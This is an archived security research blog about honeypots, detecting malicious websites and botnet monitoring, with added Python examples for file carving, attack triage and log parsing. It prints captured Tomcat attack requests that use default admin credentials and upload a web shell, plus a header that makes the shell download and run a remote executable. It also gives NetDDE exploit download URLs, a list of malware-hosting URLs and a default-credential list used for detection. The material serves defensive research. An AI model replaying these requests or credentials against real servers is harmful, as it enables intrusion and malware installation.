Virus Blog

Amun - Technical Report

— Posted by zeroq @ 19:41 - 14 Jan, 2010

I finally managed to finish my technical report on the Amun honeypot. I have tried to document all aspects of the software so that others can understand it. Maybe now it is easier for others to contribute new modules. The PDF document is available here.

 

Abstract:
In this report we describe a low-interaction honeypot named Amun, which is capable of capturing autonomously spreading malware from the internet. For this purpose, the software emulates a wide range of different vulnerabilities. As soon as an attacker exploits one of the emulated vulnerabilities, the payload transmitted by the attacker is analyzed and any download URL found in it is extracted. Next, the honeypot tries to download the malicious software and stores it on the local hard disk for further analysis. As a result, we are able to collect, ideally previously unknown, binaries of malware that automatically spreads across the network. The collected samples can for example be used to help anti-virus vendors improve their signatures.



CaptureHPC - detecting malicious websites

— Posted by zeroq @ 23:18 - 10 Dec, 2009
We are currently experimenting with the honeyclient solution CaptureHPC. We have written our own scheduler and client handler in Python and only use the Capture client application to monitor changes on the host. We still have some instability but things are getting better. We hope to release our code soon.
 
Our current setup consists of 3 CaptureHPC clients running in parallel. Our URL database is filled by extracting URLs from the Google search engine after searching for keywords retrieved from Google Trends.
We have detected the following URLs to be malicious during the last days (visit at your own risk):
 
www.icelebz.com/ celebs/ gisele_bundchen/ videos/
MD5: f4de2c9f6e6b3ff2e6d2fcd77b9e41ee - Mal/FakeAV-BP
www.experiencefestival.com/ forum/ news-vitamins/ 263373-vitamin-d-benefits-wwlp-22news.html 
MD5: 676399393b565ab1d4808600e337364a - TR/Dropper.Gen
www.gamesurge.com/ strategies/ Gameboy/ Walkthroughs-P/ Pokemon%20Missingno.shtml 
MD5: 0f0d609ddad379a65f7ad08323446ddf - Trojan-Spy.Win32.Zbot.gen
www.submitrightnow.com/ mindy_lawton_tiger_woods 
MD5: ab92cc8f7abeafffc9b588eda2f968cd - Trojan.Win32.Bredolab.Gen.1
izediotia.info/ cgi-bin/ ae 
MD5: 7231cf09b088a8fc4375aed27638f1d9 - Trojan:Win32/Alureon.DA
 
These URLs were all detected within the last four days. The scary thing is the low detection rate of current antivirus software. 


Monitoring the Waledac Botnet

— Posted by zeroq @ 22:53 - 12 Nov, 2009

We have just presented our work on monitoring the Waledac botnet at the European Conference on Computer Network Defense (EC2ND). The main focus of the paper is to get a deeper insight into the botnet, which is supposed to be the successor of the Storm Worm botnet. By analyzing the communication infrastructure we managed to construct a fake Waledac instance, called Walowdac, to infiltrate the botnet and collect interesting information. The following image shows the number of bots counted during a single day in August 2009. More information about the approach is presented in the paper.


Abstract:
A botnet is a network of compromised machines under the control of an attacker. Botnets are the driving force behind several misuses on the Internet, for example spam mails or automated identity theft. In this paper, we study the most prevalent peer-to-peer botnet in 2009: Waledac. We present our infiltration of the Waledac botnet, which can be seen as the successor of the Storm Worm botnet. To achieve this we implemented a clone of the Waledac bot named Walowdac. It implements the communication features of Waledac but does not cause any harm, i.e., no spam emails are sent and no other commands are executed. With the help of this tool we observed a minimum daily population of 55,000 Waledac bots and a total of roughly 390,000 infected machines throughout the world. Furthermore, we gathered internal information about the success rates of spam campaigns and newly introduced features like the theft of credentials from victim machines.

This work is a collaboration with Ben Stock, Markus Engelberth, Felix Freiling, and Thorsten Holz.



Network Forensics Puzzle Contest

— Posted by zeroq @ 10:14 - 25 Aug, 2009

I came across a posting on the blog of the Internet Storm Center about a little forensics contest. Although the puzzle is not very hard, it is fun to investigate. If you are willing to send in your solution, there is also a prize to win. Winners are to be announced at Sec558 Network Forensics in San Diego, 9/16-9/18.

All you have to do is analyse a pcap file containing valuable information and answer the following questions:

  1. What is the name of Ann's IM buddy?
  2. What was the first comment in the captured IM conversation?
  3. What is the name of the file Ann transferred?
  4. What is the magic number of the file you want to extract (first four bytes)?
  5. What was the MD5sum of the file?
  6. What is the secret recipe?

I won't tell you any solutions here, but I will tell you what tools I used to analyse the pcap file. The number one tool when it comes to pcap files is, in my opinion, still tcpdump. It gives you a quick overview of what happened. Use the appropriate filter options to dump the complete packet content.
This will help you to answer the first few questions. You can also use Wireshark. Another nice tool I came across while investigating the file is tcpxtract. This tool extracts files out of a pcap file. With the help of this tool you are able to extract the file that was transferred, and a bunch of other files =)
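To show what a tool like tcpxtract actually does when it pulls files out of a capture, here is a minimal signature-based carver as an added example. It is not code from the original post or from tcpxtract: it scans a byte stream (think of a reassembled TCP session) for known magic numbers, cuts each candidate out up to its footer, and reports the first four bytes and the MD5, which is exactly what questions 4 and 5 of the puzzle ask for. The signature table and the sample stream are constructed for this example; the two embedded files are a valid 1x1 PNG and a small zip built in memory, not the puzzle's data.

```python
import hashlib
import io
import struct
import zipfile
import zlib

# Header magic -> (type name, footer that closes the file, bytes that follow the footer).
# Header/footer pairs are the usual carving approach; this table is an assumption for
# the example and only covers the two formats present in the constructed stream.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ("png", b"IEND\xaeB`\x82", 0),   # IEND chunk including its CRC
    b"PK\x03\x04": ("zip", b"PK\x05\x06", 18),            # end-of-central-directory record
}


def carve(stream):
    """Scan a byte stream and return one record per carved file, ordered by offset."""
    found = []
    for magic, (kind, footer, trailer) in SIGNATURES.items():
        start = stream.find(magic)
        while start != -1:
            end = stream.find(footer, start + len(magic))
            # No footer means a truncated transfer: keep everything up to the end.
            end = len(stream) if end == -1 else end + len(footer) + trailer
            data = stream[start:end]
            found.append({
                "type": kind,
                "offset": start,
                "magic": data[:4].hex(),                # puzzle question 4
                "md5": hashlib.md5(data).hexdigest(),   # puzzle question 5
                "data": data,
            })
            start = stream.find(magic, end)
    return sorted(found, key=lambda rec: rec["offset"])


def zip_member_names(data):
    """Open a carved zip in memory; a failure here means the carve boundaries were wrong."""
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        return archive.namelist()


def _png_chunk(tag, payload):
    crc = zlib.crc32(tag + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + tag + payload + struct.pack(">I", crc)


def make_sample_png():
    """A valid 1x1 RGB PNG, constructed here as test data."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\xff\x00\x00")   # filter byte + one red pixel
    return (b"\x89PNG\r\n\x1a\n" + _png_chunk(b"IHDR", ihdr)
            + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b""))


def make_sample_zip():
    """A small stored zip with a fixed timestamp so its bytes are reproducible."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        info = zipfile.ZipInfo("recipe.txt", date_time=(2009, 8, 25, 10, 14, 0))
        archive.writestr(info, "constructed sample content, not the puzzle's file")
    return buf.getvalue()


SAMPLE_PNG = make_sample_png()
SAMPLE_ZIP = make_sample_zip()
# Constructed stand-in for a reassembled session: chat text around two transferred files.
SAMPLE_STREAM = (b"<chat> hi, sending the picture now\r\n" + SAMPLE_PNG
                 + b"\r\n<chat> and the archive\r\n" + SAMPLE_ZIP
                 + b"\r\n<chat> got it?\r\n")

if __name__ == "__main__":
    for rec in carve(SAMPLE_STREAM):
        print(rec["type"], rec["offset"], rec["magic"], rec["md5"], len(rec["data"]))
```

Because the carver only trusts header and footer bytes, a chunk of chat text that happens to contain a magic string would produce a false candidate; opening the carved zip with zip_member_names is the cheap sanity check that the cut is a real file.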

To further investigate the instant messenger session I used AimSniff. This tool extracts all kinds of instant messenger information from a given pcap. However, in this case it did not reveal anything that was not already discovered using tcpdump, but it substantiates the earlier findings.

Another nice tool I used was Chaosreader. This tool generates a nice overview of who is communicating with whom and which protocols are used. It extracts sessions and creates some small statistics.

Have fun with the challenge.



Weak Passwords with Tomcat Installations

— Posted by zeroq @ 20:35 - 29 Jul, 2009

We noticed strange HTTP scans in the vulnerabilities.log file of the Amun honeypot recently. We run Amun with web server emulation in order to catch certain attacks. What we found are scans for Tomcat installations with a weak password.

The request for Tomcat installations looks like this:

GET /manager/html HTTP/1.1
Referer: http://xxx.xxx.241.29:80/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)
Host: xxx.xxx.xxx.29:80
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

The scans look for the manager application of Tomcat, using the credentials admin:admin. Although Amun does not emulate this application, we could trigger the next step of the attack just by replying with 200 OK (standard HTTP). So the next step in the attack we monitored is a POST request to the upload directory:

POST /manager/html/upload HTTP/1.0
Connection: Keep-Alive
Content-Type: multipart/form-data; boundary=---------------------------072709230333828
Content-Length: 2495
Host: xxx.xxx.241.29
Accept: text/html, */*
Accept-Language: zh-cn
Referer: http://xxx.xxx.241.29:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Authorization: Basic YWRtaW46YWRtaW4=

-----------------------------072709230333828
Content-Disposition: form-data; name="deployWar"; filename="C:\\WINDOWS\\system32\\mui\\fexcep\\killfexcepshell.war"
Content-Type: application/x-zip-compressed
PK\x03\x04\x14\x00\x08\x00\x08\x003\x8cq:\x00
[...]

As we can see, the attacker tries to upload a file named killfexcepshell.war to our honeypot. Amun does not recognize the attack, but it stores hexdumps of unknown attack attempts to disk. We were therefore able to reconstruct the zip file from the hexdump. It extracts to the following files and directories:
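The two requests above are easy to spot automatically: the Authorization header is plain Base64 of user:password, and the deploy step announces itself with a multipart field named deployWar. The following triage routine is an added example, not code from the original post or from Amun. It parses a raw HTTP request, decodes the Basic credentials, compares them against a small list of default pairs (the list is an assumption for this example), and flags manager probes and WAR deploy attempts. The three captured requests are constructed after the ones quoted above, with hosts moved to the 192.0.2.0/24 documentation range.

```python
import base64
import binascii
import re

# Default pairs commonly tried against the Tomcat manager (assumption for this example).
DEFAULT_CREDENTIALS = {("admin", "admin"), ("tomcat", "tomcat"), ("manager", "manager"), ("admin", "")}
MANAGER_PATHS = ("/manager/html", "/manager/text", "/manager/status")


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")   # only the first colon separates name and value
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path.split("?", 1)[0], "headers": headers, "body": body}


def decode_basic_auth(value):
    """Return (user, password) from a Basic Authorization header, or None if it is not one."""
    scheme, _, token = value.partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None
    user, _, password = decoded.partition(":")
    return user, password


def triage(raw):
    """Return the decoded credentials and a list of findings for one captured request."""
    req = parse_request(raw)
    findings = []
    creds = None
    auth = req["headers"].get("authorization")
    if auth is not None:
        creds = decode_basic_auth(auth)
        if creds in DEFAULT_CREDENTIALS:
            findings.append("default-credential-login:%s" % creds[0])
    if req["path"].startswith(MANAGER_PATHS):
        findings.append("tomcat-manager-probe")
    if req["method"] == "POST" and 'name="deployWar"' in req["body"]:
        match = re.search(r'filename="([^"]*)"', req["body"])
        # The filename is whatever the client sent; keep only the last path component.
        war = re.split(r"[\\/]", match.group(1))[-1] if match else "?"
        findings.append("war-deploy-attempt:%s" % war)
    return {"method": req["method"], "path": req["path"], "credentials": creds, "findings": findings}


# Constructed captures modelled on the requests quoted above.
SCAN_GET = ("GET /manager/html HTTP/1.1\r\n"
            "Referer: http://192.0.2.29:80/manager/html\r\n"
            "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)\r\n"
            "Host: 192.0.2.29:80\r\n"
            "Connection: Close\r\n"
            "Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n")

DEPLOY_POST = ("POST /manager/html/upload HTTP/1.0\r\n"
               "Content-Type: multipart/form-data; boundary=---------------------------072709230333828\r\n"
               "Host: 192.0.2.29\r\n"
               "Authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n"
               "-----------------------------072709230333828\r\n"
               'Content-Disposition: form-data; name="deployWar"; '
               r'filename="C:\\WINDOWS\\system32\\mui\\fexcep\\killfexcepshell.war"' "\r\n"
               "Content-Type: application/x-zip-compressed\r\n\r\n"
               "PK\x03\x04(truncated constructed payload)\r\n")

BENIGN_GET = "GET /index.html HTTP/1.1\r\nHost: 192.0.2.29\r\nConnection: Close\r\n\r\n"

if __name__ == "__main__":
    for capture in (SCAN_GET, DEPLOY_POST, BENIGN_GET):
        result = triage(capture)
        print(result["method"], result["path"], result["credentials"], result["findings"])
```

On a real manager instance the same check belongs in the access log pipeline: a 200 on /manager/html with a default pair, followed within seconds by a POST to /manager/html/upload, is the sequence shown in the two captures above.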

WEB-INF
ok.jsp
META-INF
index.jsp

Unfortunately no further requests hit our honeypot, so we do not know what would have happened next. Googling for the filename, however, revealed a blog entry that is not reachable anymore. Google Cache is your friend, though.

According to their investigation, after uploading the zip file the attacker issues a GET request to the following URL:

GET /killfexcepshell/index.jsp HTTP/1.1
Referer: http://x.x.x.x:8080/killfexcepshell/index.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; IE 7)
Host: x.x.x.x:8080
Connection: Close
Cache-Control: no-cache
Cache-Vip-Url:http://www.<hidden>.cn/tomcat.exe

The interesting part is the Cache-Vip-Url header pointing to some executable file on a Chinese web server. So what does index.jsp do? It rewrites the tomcat-users.xml file to read as follows:

<?xml version='1.0' encoding='utf-8'?>
<tomcat-users>
<role rolename="tomcat"/>
<role rolename="role1" />
<role rolename="manager"/>
<role rolename="admin"/>
<user username="admin" password="<hidden>" roles="admin,manager"/>
</tomcat-users>

The other operation index.jsp performs is to look for the above-mentioned Cache-Vip-Url HTTP header field and try to download and execute the file it points to. In case the compromised system is not Windows, the script aborts. Unfortunately we do not have a working URL to download the binary and check what it does. According to the above-mentioned blog entry, the malware is called PcClient, some kind of remote administration tool.

The ok.jsp file is just used to display the results of running index.jsp. The funny thing about index.jsp is that it contains a routine to generate a random password to be inserted into the tomcat-users.xml file. However, the randomly generated password is never used; it is just returned to the attacker, while the XML file gets a hardcoded password.



Amun v0.1.8

— Posted by zeroq @ 09:12 - 27 Jul, 2009

Although I was not able to finish everything I had planned for the new version, due to lack of time, I decided to release it anyway. So Amun v0.1.8 has a lot of fixes, modifications, and additional stuff. Feedback is always welcome. The documented changes are the following:

 Changes in v0.1.8:
        - added ulm shellcode handler
        - added bergheim shellcode handler
        - added langenfeld connectback2
        - added leimbach encoded tftp command detection
        - added pexalphanumeric b64encoded plain url detection
        - added new amun smb handler
        - fixed netdde vulnerability
        - fixed missing socket import for log-blastomat module
        - fixed reply function to send all bytes
        - fixed amun crash on already used port/address
        - fixed anubis submission module
        - fixed amun ftp NAT download
        - modified ftp_download_core to handle broken pipe on push command
        - modified vuln-http to serve images from folder
        - modified log-surfnet configuration to accept database port
        - modified vuln-arc to no reply
        - modified md5 to hashlib (deprecated warning)
        - modified popen2 to subprocess (deprecated warning)
        - removed conn= parameter prefix for asynchat.async_chat.__init__



Archlinux Atheros WLAN

— Posted by zeroq @ 08:37 - 24 Jul, 2009

For those of you struggling with an Atheros WLAN card under the Archlinux distribution, I have a few hints.

The card I use shows up like this:
lspci | grep Atheros
01:0b.0 Network controller: Atheros Communications Inc. AR5008 Wireless Network Adapter (rev 01)

My current kernel version is 2.6.30. The software needed is wpa_supplicant. The most important thing is to make sure the athXk kernel module does not load (X is a number, currently it's 9, and was 5 previously). To ensure this, modify your rc.conf and add MODULES=( ... !ath9k). The only modules that are loaded (lsmod | grep ath) are ath_pci, wlan, ath_rate_sample, and ath_hal. To check your setup use ifconfig -a; you should find a device called ath0. Bring it up using ifconfig ath0 up and do an iwlist ath0 scan to scan for access points nearby. To connect to an access point use iwconfig ath0 essid YourSSID and start your wpa_supplicant by issuing wpa_supplicant -B -iath0 -c/etc/wpa_supplicant.conf. If your access point hands out IPs using DHCP, use the command dhcpcd ath0 to get one.

An example wpa_supplicant.conf for a WPA-secured network looks as follows:

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=wheel
eapol_version=1
ap_scan=1
fast_reauth=1
network={
ssid="YourSSID"
scan_ssid=1
proto=WPA
key_mgmt=WPA-PSK
psk="YourPassphrase(plain ASCII)"
auth_alg=OPEN
}

That is basically all you need to do. To automate the process at boot up, edit your rc.local and add the lines:

ifconfig ath0 up
iwconfig ath0 essid YourSSID
wpa_supplicant -B -iath0 -c/etc/wpa_supplicant.conf
dhcpcd ath0

That's it.



Visual Analysis of Malware Behavior

— Posted by zeroq @ 17:38 - 26 Jun, 2009

As my colleague Philipp already mentioned in his blog, our short paper about the visualization of malware behaviour has been accepted at this year's VizSec Workshop (11 October, Atlantic City, NJ, USA).

We use transformed sandbox reports as a visualization basis. The recorded malware behaviour is displayed in different ways to aid malware researchers. I will blog more on this topic as soon as the workshop is over. 



Glastopf Webhoneypot Version 0.2.0

— Posted by zeroq @ 14:01 - 14 Jun, 2009

Lukas from Glasblog released a new version of his web honeypot Glastopf yesterday. Several new modules have been implemented, including a Twitter and an IRC module to log current statistics and attack information. A complete changeset can be found here.

A web honeypot can be used to detect remote/local file inclusion attacks against current web applications, such as phpMyAdmin or the RoundCube webmailer. The honeypot simulates several vulnerable web applications and extracts injected commands from the incoming requests. A request can, for example, try to load another file from a remote server that is already under the control of the attacker and execute it in the context of the web server. In some cases these remotely loaded files contain IRC bots that allow the attacker to take control over the attacked system. Other methods to compromise the system include gathering information about the running operating system and then including a local root exploit to take complete control over the server.



Amun: NetDDE Reloaded

— Posted by zeroq @ 20:54 - 09 Jun, 2009
I am currently working on the CIFS simulation of Amun, so that requests to vulnerabilities like NetDDE, LSASS, or MS08067 can be answered correctly. First results are promising: although the documentation of the protocol is not the best, I managed to simulate a Windows 2000 host for the NetDDE vulnerability (MS04031) well enough to finally trigger current exploits in the wild. I also had to add a new shellcode decoder detection pattern in order to recognize the shellcode used in sample exploits available on the internet.

So far I was able to capture two attacks from different hosts against the NetDDE vulnerability:
exploit 137.118.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@137.118.xxx.xxx:5056/['Cilevb.com'])

exploit  72.253.xxx.xxx -> xxx.xxx.xxx.xxx:139
(NETDDE Vulnerability: ftp://1:1@72.253.xxx.xxx:50112/['myreceve.com'])


Unfortunately only one download worked, the second one. The malware has the MD5 hash 05f9bcf3a7d0ab7b4d4066c095f4c732 and the Anubis Sandbox report can be found here. According to VirusTotal it is a Virut/Rbot variant, which is already well detected by current anti-virus engines.

I have just started to integrate the new CIFS simulation with the MS08067 vulnerability emulation, but I am not yet finished. I will also update the other vulnerability modules that rely on a working simulation rather than random bytes with a few bytes set to certain values. There will be a new release of Amun soon, so stay tuned.
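The two captured attacks above show the shape of what Amun extracts from a NetDDE payload: an FTP URL with embedded credentials (1:1), an ephemeral port on the attacking host, and the requested file names as a Python list literal in the path. As an added example, not code from the original post or from Amun, here is a parser for that two-line record form that turns each entry into a structured record and a defanged download location suitable for sharing. The record layout is taken from the lines shown above; the sample log is constructed, with the masked addresses replaced by 203.0.113.0/24 and 192.0.2.0/24 documentation addresses.

```python
import ast
import re
from urllib.parse import unquote, urlsplit

# One record spans two lines in the form shown above: the exploit line with source and
# target, then the vulnerability name and the download URL in parentheses.
RECORD_RE = re.compile(
    r"exploit\s+(?P<src>\S+)\s+->\s+(?P<dst>\S+?):(?P<dport>\d+)\s*"
    r"\((?P<vuln>[^:()]+):\s*(?P<url>[^\s()]+)\)"
)


def defang(parts, files):
    """Render a download location so it is not clickable or auto-linked when shared."""
    host = parts.hostname.replace(".", "[.]")
    location = "%s[:]//%s" % (parts.scheme, host)
    if parts.port is not None:
        location += ":%d" % parts.port
    return location + "/" + ",".join(files)


def parse_record(match):
    parts = urlsplit(match.group("url"))
    # The path carries the requested file names as a list literal; literal_eval
    # parses that without evaluating arbitrary code, and falls back to the raw path.
    path = unquote(parts.path.lstrip("/"))
    try:
        names = ast.literal_eval(path)
        files = list(names) if isinstance(names, (list, tuple)) else [str(names)]
    except (ValueError, SyntaxError):
        files = [path]
    return {
        "source": match.group("src"),
        "target": match.group("dst"),
        "target_port": int(match.group("dport")),
        "vuln": match.group("vuln").strip(),
        "scheme": parts.scheme,
        "credentials": (parts.username, parts.password),
        "host": parts.hostname,
        "port": parts.port,
        "files": files,
        "defanged": defang(parts, files),
    }


def parse_amun_log(text):
    """Return one structured record per exploit entry found in the log text."""
    return [parse_record(m) for m in RECORD_RE.finditer(text)]


# Constructed log excerpt in the two-line form quoted above.
SAMPLE_LOG = """\
exploit 203.0.113.10 -> 192.0.2.5:139
(NETDDE Vulnerability: ftp://1:1@203.0.113.10:5056/['Cilevb.com'])

exploit  203.0.113.77 -> 192.0.2.5:139
(NETDDE Vulnerability: ftp://1:1@203.0.113.77:50112/['myreceve.com'])
"""

if __name__ == "__main__":
    for rec in parse_amun_log(SAMPLE_LOG):
        print(rec["source"], rec["vuln"], rec["credentials"], rec["defanged"])
```

Parsing the URL with urlsplit rather than string slicing keeps the credentials, host and port separate, which matters here because the FTP server is the attacking host itself on a throwaway port: the host and port pair is the indicator worth keeping, and the defanged form is what goes into a report.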

